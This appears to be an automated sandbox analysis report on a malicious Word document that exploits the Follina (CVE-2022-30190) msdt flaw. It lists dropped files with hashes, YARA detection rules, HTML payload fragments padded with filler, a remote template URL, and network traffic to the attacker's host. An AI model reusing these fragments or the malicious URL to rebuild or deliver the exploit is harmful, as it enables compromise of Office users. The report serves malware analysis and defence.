        • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htm, Author: Tobias Michalski, Christian Burkard
        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\951D3BEA.htm, Author: Joe Security
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Reputation:low
        Preview:<!doctype html>.<html lang="en">.<body>.<script>.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAA

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB03D47C.htm

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:HTML document, ASCII text
        Category:dropped
        Size (bytes):9436
        Entropy (8bit):0.6237714669020853
        Encrypted:false
        SSDEEP:192:VBffffFfBffffFfBffffFfBffffFfBffffFfBffffFfBffffFfBffffRz:d
        MD5:FBDACF8FB5CCA0ABFED43223D32F89DD
        SHA1:72A038DF096C97FBF7514808D181D6AD356C5443
        SHA-256:30FCFA7F6292D3D62578F625F181BE62A222B0E6EA20A469E27FC1B23B94DBAB
        SHA-512:21FE9482108179333D92A7EF3ED6F8C705B6DEC4A43BA5A36C7E30677215887620C466E189F4D0D74A0CC9CF0AF990ECF5F2D19A4126E5E118DF82F8213942A4
        Malicious:true
        Yara Hits:
        • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB03D47C.htm, Author: Nasreddine Bencherchali, Christian Burkard
        • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB03D47C.htm, Author: Tobias Michalski, Christian Burkard
        • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB03D47C.htm, Author: Joe Security
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Reputation:low
        Preview:<!doctype html>.<html lang="en">.<body>.<script>.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.//AAAAAAAAAAAAAAAA

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{CAFD337F-CA0A-421A-962F-5A83F314B963}.tmp

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):5120
        Entropy (8bit):2.0373587739224037
        Encrypted:false
        SSDEEP:24:r/aEK/OD5oeZU2eZUliy5oeZqioaZHkodSeZUliD:r/aRK5okLiy5o8Zl4Li
        MD5:59A7B83F205331057BEA523D3278CF97
        SHA1:699F1642486E7B192C1EA3F43BC6B3C29E65B785
        SHA-256:3F87C5353FAC6F858A4C09090326AD220E6968E5D0A1BF830C6F51157F8DA052
        SHA-512:EE9EBE72770A80954E9EFBA1A1E7CDD36BA5560FF6A97BEC887298DA16F7B26451CC856C1926A1DB9211AFF621B5BD8604976BE1BE8E6EB4EEF007C6C084B16F
        Malicious:false
        Reputation:low
        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{27621888-E8BB-4FE6-AECB-5EEE72734B15}.tmp

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1536
        Entropy (8bit):0.7949885255254345
        Encrypted:false
        SSDEEP:6:FlIcElClbYeZlYDV5llAabK/W3RtF5GwPxZSuWg:Fl7MClceZiDV7XK8tRZSfg
        MD5:13E2E20732A6309682DD5C15F9F6D98A
        SHA1:AD38FF2C76AD28A9A6F386079F685C4A907C48E8
        SHA-256:DC56243772C94E385579D36ACE9D7B6FEE2D2C3D32D1296568F3B3E351A5258E
        SHA-512:C34D516516E8ED5F7F886513D8FEBA29A1D38ACAB252D9806286757F60CB451401AEEFD7A1E9FDDE31B2C992E1C8CC42C555372E024C9563F7AA357021274C6D
        Malicious:false
        Reputation:low
        Preview:....L.I.N.K. .P.a.c.k.a.g.e. .".h.t.t.p.s.:././.a.s.c.o.t.a...c.c./.i.n.d.e.x...h.t.m.l.!.". .".". .\.b..... . .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{5F4EA255-C5EC-4225-B349-94755FC9E7B4}.tmp

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.05390218305374581
        Encrypted:false
        SSDEEP:3:ol3lYdn:4Wn
        MD5:5D4D94EE7E06BBB0AF9584119797B23A
        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
        Malicious:false
        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Temp\{1745517E-048D-4BB7-909A-157B39D88B65}

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.025573008846209794
        Encrypted:false
        SSDEEP:6:I3DPc/G1r9f09HvxggLRxadxqg6cemRXv//4tfnRujlw//+GtluJ/eRuj:I3DP/1r98PY7LdeuvYg3J/
        MD5:83775F54893895A78EFFE9F812647586
        SHA1:7490E5AA0027EFB37EECBC531C50640B0EB337BE
        SHA-256:F626D8232CDE87185CA591A1465567D1CA65545EEE48DEA9B348B5AC2B55E5F4
        SHA-512:6DDF39709B9EE0C06B5419030EF131A90F87524C0404B92D147B6FCEFC691E7FD566AC285FB86EA0F87AD15B6EF361D230F2D22F0CB9FA16E6A64AB56D0535D3
        Malicious:false
        Preview:......M.eFy...zxT...._A.N7...O.S,...X.F...Fa.q............................&.8J.P\L.....C.........Fq..._.H..e..!*......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Temp\{3030D6C8-DC9E-4CCC-8285-A68F140AE3A2}

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.02562727762897618
        Encrypted:false
        SSDEEP:6:I3DPc40vAg9HvxggLRzStnuVq/DRXv//4tfnRujlw//+GtluJ/eRuj:I3DPR4Pfsaq9vYg3J/
        MD5:6EE917386A8FA5D27D420C50459CA68B
        SHA1:925B897B79026C15EB7ECC5F665D5405E0AE3F4B
        SHA-256:FC7C7F5A5DF336010466652E52A13390B83E626E2DA3BE7993A1A003566068F5
        SHA-512:0A0C450E857EF5E15F5AF2B868ACA4D115D8CCF57C84858E0AEB6FF2EC319B9EBC7EC306EB06E573A55CB725D73A0A9E4EE24EB712A1304FBBF388E276E4879E
        Malicious:false
        Preview:......M.eFy...z.|QB..|N..'t.%7ES,...X.F...Fa.q................................&!K....9............qo.<%pJ.H..h........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\3BgX69C870.LNK

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Aug 18 16:44:03 2022, mtime=Thu Aug 18 16:44:03 2022, atime=Thu Aug 18 16:44:14 2022, length=15283, window=hide
        Category:dropped
        Size (bytes):1019
        Entropy (8bit):4.555225279433788
        Encrypted:false
        SSDEEP:12:8zec80gXg/XAlCPCHaXBKBnB/wAuX+WB+8lcRAjuicvbIn54FRKNDtZ3YilMMEpS:8zek/XTRKJ8z+8lOUNeUnmODv3qc4u7D
        MD5:C6AFCFF431D2AD77DBD16B768CA7A5D3
        SHA1:7D4958E0A91002B859737C73111F496376935119
        SHA-256:1F8BFA4304CA8986F5FED27006B34A414307240AFD9C9EEE37A95A317E3D31A1
        SHA-512:94B26E8FC8E44B014278905CC264819776E2DBF974542674EA721D388377E6AE61E42EFBDD90B4ECCFA596748912252AE8010D7BF9BE12736EF2F790EBEEFFD8
        Malicious:false
        Preview:L..................F.... .....>.*.....>.*....*."*....;...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1......U....Desktop.d......QK.X.U..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2..;...U.. .3BGX69~1.DOC..L.......U...U..*.........................3.B.g.X.6.9.C.8.7.0...d.o.c.x.......y...............-...8...[............?J......C:\Users\..#...................\\585948\Users.user\Desktop\3BgX69C870.docx.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.3.B.g.X.6.9.C.8.7.0...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......585948..........D_....3N...W...9G..N..... .....[D_....3N...W...9G

        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):72
        Entropy (8bit):4.862798141185997
        Encrypted:false
        SSDEEP:3:bDuMJlI+TXdSemxWYxXdSev:bCd+8
        MD5:5DD5FC2ECB0B586CBAD963A7F61B53DF
        SHA1:EF9B7CB148FD107EF933A72170AD667EC7247051
        SHA-256:AA4697402C69F0571055F140707E6B800F70222BB9A960EC96C3D841E7F35B9B
        SHA-512:9EBFD526875123116426D7619E9317E359E936CD99FCD033189DD8179B8A9FB97113384DD940DB07449F26CFE308707A8C473B5E97F448352D1907CF4F2600EB
        Malicious:false
        Preview:[folders]..Templates.LNK=0..3BgX69C870.LNK=0..[misc]..3BgX69C870.LNK=0..

        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.503835550707525
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
        MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
        SHA1:23684CCAA587C442181A92E722E15A685B2407B1
        SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
        SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

        C:\Users\user\Desktop\~$gX69C870.docx

        Download File
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.503835550707525
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
        MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
        SHA1:23684CCAA587C442181A92E722E15A685B2407B1
        SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
        SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

        Static File Info

        General

        File type:Microsoft OOXML
        Entropy (8bit):7.747336678011937
        TrID:
        • Word Microsoft Office Open XML Format document (49504/1) 49.01%
        • Word Microsoft Office Open XML Format document (43504/1) 43.07%
        • ZIP compressed archive (8000/1) 7.92%
        File name:3BgX69C870.docx
        File size:15283
        MD5:d805b55d60f9ca73ae71ed68ff692175
        SHA1:947691dbba33dfeb974babcb43d3ceb7991dae29
        SHA256:6a0acf2389d95abc590c8b6a327521312c4de176efce271468817c840745a096
        SHA512:940890f2ad0ba703105b7a18ddef885a11d1930feeea92e554c9734c25784fd4038d4eb43513670ee50f4db3afc7190d92491442075ea58093780570ab9fea40
        SSDEEP:384:e4v4JzIBKmyE084Uv4+dMCl0lnlOM003S7:hvAzIBFyEf5v4+AnXo
        TLSH:6A629E34CC06BC29C51F233C31EA1791FEF8688251A48219F9F805DD5CAE6575B3ABAD
        File Content Preview:PK..........!..l.$l...........[Content_Types].xml...n.0.E......(1tQU..E...T...=..~.6....PT!h...H......L...*[..........p+....m....,Df.S.@I...pp}.......&.d....4..h....`..^...~J...l.........&.1y.A..j6W1{Z......d.M_.*.sNI.".......... ,.k..V..z...=......:...T9

        File Icon

        Icon Hash:e4e6a2a2a4b4b4a4

        Network Behavior

        Snort IDS Alerts

        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
        192.168.2.228.8.8.855275532027758 08/18/22-10:45:08.539171UDP2027758ET DNS Query for .cc TLD5527553192.168.2.228.8.8.8
        192.168.2.228.8.8.849688532027758 08/18/22-10:45:02.957827UDP2027758ET DNS Query for .cc TLD4968853192.168.2.228.8.8.8
        192.168.2.228.8.8.858836532027758 08/18/22-10:45:02.979786UDP2027758ET DNS Query for .cc TLD5883653192.168.2.228.8.8.8
        192.168.2.228.8.8.859915532027758 08/18/22-10:45:11.469767UDP2027758ET DNS Query for .cc TLD5991553192.168.2.228.8.8.8
        192.168.2.228.8.8.855868532027758 08/18/22-10:44:56.070010UDP2027758ET DNS Query for .cc TLD5586853192.168.2.228.8.8.8
        192.168.2.228.8.8.854408532027758 08/18/22-10:45:11.508650UDP2027758ET DNS Query for .cc TLD5440853192.168.2.228.8.8.8
        192.168.2.228.8.8.850134532027758 08/18/22-10:45:08.507639UDP2027758ET DNS Query for .cc TLD5013453192.168.2.228.8.8.8

        Network Port Distribution

        TCP Packets

        TimestampSource PortDest PortSource IPDest IP
        Aug 18, 2022 10:44:56.110918999 CEST49171443192.168.2.2250.31.246.2
        Aug 18, 2022 10:44:56.110989094 CEST4434917150.31.246.2192.168.2.22
        Aug 18, 2022 10:44:56.111056089 CEST49171443192.168.2.2250.31.246.2
        Aug 18, 2022 10:44:56.127644062 CEST49171443192.168.2.2250.31.246.2
        Aug 18, 2022 10:44:56.127667904 CEST4434917150.31.246.2192.168.2.22
        Aug 18, 2022 10:44:56.204488039 CEST4434917150.31.246.2192.168.2.22
        Aug 18, 2022 10:44:56.204626083 CEST49171443192.168.2.2250.31.246.2
        Aug 18, 2022 10:44:56.216613054 CEST49171443192.168.2.2250.31.246.2
        Aug 18, 2022 10:44:56.216628075 CEST4434917150.31.246.2192.168.2.22
        Aug 18, 2022 10:44:56.216963053 CEST4434917150.31.246.2192.168.2.22
        Aug 18, 2022 10:44:56.217036009 CEST49171443192.168.2.2250.31.246.2
        Aug 18, 2022 10:44:56.559472084 CEST49171443192.168.2.2250.31.246.2
        Aug 18, 2022 10:44:56.603377104 CEST4434917150.31.246.2192.168.2.22
        Aug 18, 2022 10:44:56.907156944 CEST4434917150.31.246.2192.168.2.22
        Aug 18, 2022 10:44:56.907228947 CEST49171443192.168.2.2250.31.246.2
        Aug 18, 2022 10:44:56.907248974 CEST4434917150.31.246.2192.168.2.22
        Aug 18, 2022 10:44:56.907290936 CEST49171443192.168.2.2250.31.246.2
        Aug 18, 2022 10:44:56.907299042 CEST4434917150.31.246.2192.168.2.22
        Aug 18, 2022 10:44:56.907334089 CEST49171443192.168.2.2250.31.246.2
        Aug 18, 2022 10:44:56.907345057 CEST4434917150.31.246.2192.168.2.22
        Aug 18, 2022 10:44:56.907412052 CEST49171443192.168.2.2250.31.246.2
        Aug 18, 2022 10:44:56.907958031 CEST49171443192.168.2.2250.31.246.2
        Aug 18, 2022 10:44:56.907973051 CEST4434917150.31.246.2192.168.2.22
        Aug 18, 2022 10:44:56.908071995 CEST49171443192.168.2.2250.31.246.2
        Aug 18, 2022 10:44:56.908097982 CEST49171443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:03.009675026 CEST49172443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:03.009707928 CEST4434917250.31.246.2192.168.2.22
        Aug 18, 2022 10:45:03.009780884 CEST49172443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:03.010154009 CEST49172443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:03.010165930 CEST4434917250.31.246.2192.168.2.22
        Aug 18, 2022 10:45:03.070147038 CEST4434917250.31.246.2192.168.2.22
        Aug 18, 2022 10:45:03.070317030 CEST49172443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:03.082806110 CEST49172443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:03.082834959 CEST4434917250.31.246.2192.168.2.22
        Aug 18, 2022 10:45:03.083210945 CEST4434917250.31.246.2192.168.2.22
        Aug 18, 2022 10:45:03.106344938 CEST49172443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:03.147375107 CEST4434917250.31.246.2192.168.2.22
        Aug 18, 2022 10:45:03.312668085 CEST4434917250.31.246.2192.168.2.22
        Aug 18, 2022 10:45:03.312817097 CEST4434917250.31.246.2192.168.2.22
        Aug 18, 2022 10:45:03.312953949 CEST49172443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:03.313256025 CEST49172443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:03.313282013 CEST4434917250.31.246.2192.168.2.22
        Aug 18, 2022 10:45:03.313358068 CEST49172443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:03.313371897 CEST4434917250.31.246.2192.168.2.22
        Aug 18, 2022 10:45:08.559432030 CEST49173443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:08.559464931 CEST4434917350.31.246.2192.168.2.22
        Aug 18, 2022 10:45:08.559551954 CEST49173443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:08.562249899 CEST49173443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:08.562268019 CEST4434917350.31.246.2192.168.2.22
        Aug 18, 2022 10:45:08.620413065 CEST4434917350.31.246.2192.168.2.22
        Aug 18, 2022 10:45:08.620532990 CEST49173443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:08.630100012 CEST49173443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:08.630115032 CEST4434917350.31.246.2192.168.2.22
        Aug 18, 2022 10:45:08.631015062 CEST4434917350.31.246.2192.168.2.22
        Aug 18, 2022 10:45:08.659550905 CEST49173443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:08.703385115 CEST4434917350.31.246.2192.168.2.22
        Aug 18, 2022 10:45:08.936106920 CEST4434917350.31.246.2192.168.2.22
        Aug 18, 2022 10:45:08.936254025 CEST4434917350.31.246.2192.168.2.22
        Aug 18, 2022 10:45:08.936328888 CEST49173443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:08.938308954 CEST49173443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:08.938348055 CEST4434917350.31.246.2192.168.2.22
        Aug 18, 2022 10:45:08.938364029 CEST49173443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:08.938375950 CEST4434917350.31.246.2192.168.2.22
        Aug 18, 2022 10:45:08.938580990 CEST49174443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:08.938620090 CEST4434917450.31.246.2192.168.2.22
        Aug 18, 2022 10:45:08.938694000 CEST49174443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:08.938838959 CEST49174443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:08.938848972 CEST4434917450.31.246.2192.168.2.22
        Aug 18, 2022 10:45:08.997056007 CEST4434917450.31.246.2192.168.2.22
        Aug 18, 2022 10:45:08.997695923 CEST49174443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:08.997721910 CEST4434917450.31.246.2192.168.2.22
        Aug 18, 2022 10:45:08.999399900 CEST49174443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:08.999416113 CEST4434917450.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.222035885 CEST4434917450.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.222213984 CEST4434917450.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.222305059 CEST49174443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.222534895 CEST49174443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.222562075 CEST4434917450.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.222976923 CEST49175443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.223023891 CEST4434917550.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.223114967 CEST49175443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.223396063 CEST49175443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.223412991 CEST4434917550.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.281143904 CEST4434917550.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.282186031 CEST49175443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.282212973 CEST4434917550.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.283631086 CEST49175443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.283643007 CEST4434917550.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.489491940 CEST4434917550.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.489728928 CEST4434917550.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.489875078 CEST49175443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.490319967 CEST49175443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.490341902 CEST4434917550.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.490752935 CEST49176443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.490807056 CEST4434917650.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.490891933 CEST49176443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.491179943 CEST49176443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.491202116 CEST4434917650.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.548535109 CEST4434917650.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.548935890 CEST49176443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.548962116 CEST4434917650.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.549851894 CEST49176443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.549870968 CEST4434917650.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.734992027 CEST4434917650.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.735234022 CEST4434917650.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.735497952 CEST49176443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.736270905 CEST49176443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.736301899 CEST4434917650.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.779505014 CEST49177443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.779555082 CEST4434917750.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.779746056 CEST49177443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.780205011 CEST49177443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.780221939 CEST4434917750.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.836461067 CEST4434917750.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.836708069 CEST49177443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.850028992 CEST49177443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.850055933 CEST4434917750.31.246.2192.168.2.22
        Aug 18, 2022 10:45:09.853773117 CEST49177443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:09.853797913 CEST4434917750.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.074111938 CEST4434917750.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.074199915 CEST4434917750.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.074202061 CEST49177443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.074220896 CEST4434917750.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.074284077 CEST49177443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.074294090 CEST4434917750.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.074309111 CEST4434917750.31.246.2192.168.2.22
        Aug 18, 2022 10:45:10.074337959 CEST49177443192.168.2.2250.31.246.2
        Aug 18, 2022 10:45:10.074347019 CEST4434917750.31.246.2192.168.2.22
